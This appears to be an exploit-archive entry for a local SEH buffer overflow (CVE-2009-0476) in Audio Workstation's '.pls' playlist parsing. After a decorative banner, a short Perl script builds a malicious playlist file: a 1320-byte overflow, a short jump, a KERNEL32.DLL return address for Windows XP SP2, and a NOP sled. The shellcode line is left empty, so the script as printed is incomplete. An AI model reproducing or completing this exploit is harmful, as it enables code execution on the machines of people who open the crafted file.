Audio Workstation - '.pls' Local Buffer Overflow (SEH)

Related Vulnerabilities: CVE-2009-0476  
Publish Date: 24 Sep 2009
Author: germaya_x
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
      Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)
	[�] Exploited by:.......[       germaya_x       ].....................
        [�] Script:.............[   Audio Workstation   ].....................
        [�] version:............[       ]
	[�] Today:..............[       24/09/2009      ].....................
        [�] platform............[        Windows        ].....................
        [�] tested on:..........[     Windows XP SP2    ].....................
        [�] greetz:.............[  his0k4/D3v!LFUCK3R   ].....................

my $shellcode=
my $bof="\x41" x 1320;
my $nsh="\xEB\x09\x90\x90";# Short jmp
my $seh="\x5D\x38\x82\x7C";# KERNEL32.DLL
my $nop="\x90" x 20;
open(myfile,'>> germaya_x.pls');
print myfile $bof.$nsh.$seh.$nop.$shellcode;